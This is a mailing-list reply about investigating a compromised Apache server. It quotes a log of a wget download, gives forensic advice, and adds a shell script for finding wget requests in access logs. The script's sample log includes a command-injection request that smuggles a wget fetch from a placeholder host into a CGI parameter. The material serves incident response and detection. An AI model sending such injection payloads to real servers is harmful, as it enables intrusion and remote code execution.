
Re: Am I Compromised -- Some interesting findings



On Fri, Nov 25, 2005 at 10:12:25PM +0530, Ritesh Raj Sarraf wrote:

> Now let's look a little of /var/log/apache2/error.log:
> 
> Resolving maple.phpwebhosting.com... 70.86.76.34
> Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 18,698 [text/plain]
> 
>     0K .......... ........                                   100%  210.37
> KB/s

  Looks like it was downloaded via wget.

  Run "grep wget /var/log/apache/access.log" - that should give you the
 IP address of the attacking host.

  It might be worth posting any matching lines; that way somebody might
 be able to tell you which script (cgi/php/etc) was used as the attack
 vector.

  Definitely a time to wipe, reinstall and import your backups though.

> The logs show that the guy uploaded the files to /tmp and hid them.

  Indeed, but we need to find out what allowed them to do so -
  presumably something insecure running upon your host.  Until you know
  what it was reinstalling will not prevent it from happening again.

Steve
--
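The access-log check Steve suggests, as an added example that is not part of the original thread: it assumes Apache's Combined Log Format, matches "wget" only inside the request field (so a legitimate client whose User-Agent is "Wget/..." is not counted), and runs on constructed sample lines with placeholder addresses and paths.

```shell
#!/bin/sh
# Added example (not from the original thread). Lists which client IPs
# sent requests containing "wget" and which script path they hit, the
# two facts needed to identify the attacking host and the attack vector.
# Assumes Apache Combined Log Format: client IP is the first field, the
# request and the User-Agent are quoted fields.

# Print "count client_ip request_path" for each matching entry,
# most frequent first. Only the request field ($2 when splitting on
# double quotes) is inspected, not the User-Agent field.
wget_hits() {
    awk -F'"' 'tolower($2) ~ /wget/ {
        split($1, pre, " ")   # pre[1] = client IP
        split($2, req, " ")   # req[2] = request path incl. query string
        print pre[1], req[2]
    }' "$1" | sort | uniq -c | sort -rn
}

# Write constructed sample log lines (placeholder hosts and paths) to $1.
# The last line is a normal mirror client using wget and must NOT match.
write_sample_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [25/Nov/2005:21:55:01 +0530] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.77 - - [25/Nov/2005:22:01:13 +0530] "GET /cgi-bin/example.cgi?arg=;wget%20http://198.51.100.200/x HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.77 - - [25/Nov/2005:22:01:20 +0530] "GET /cgi-bin/example.cgi?arg=;wget%20http://198.51.100.200/x HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [25/Nov/2005:22:03:40 +0530] "GET /debian/Release HTTP/1.0" 200 7890 "-" "Wget/1.10.2"
EOF
}

# On a real system: wget_hits /var/log/apache2/access.log
# Run with --demo to try it on the constructed sample.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    write_sample_log "$tmp"
    wget_hits "$tmp"
    rm -f "$tmp"
fi
```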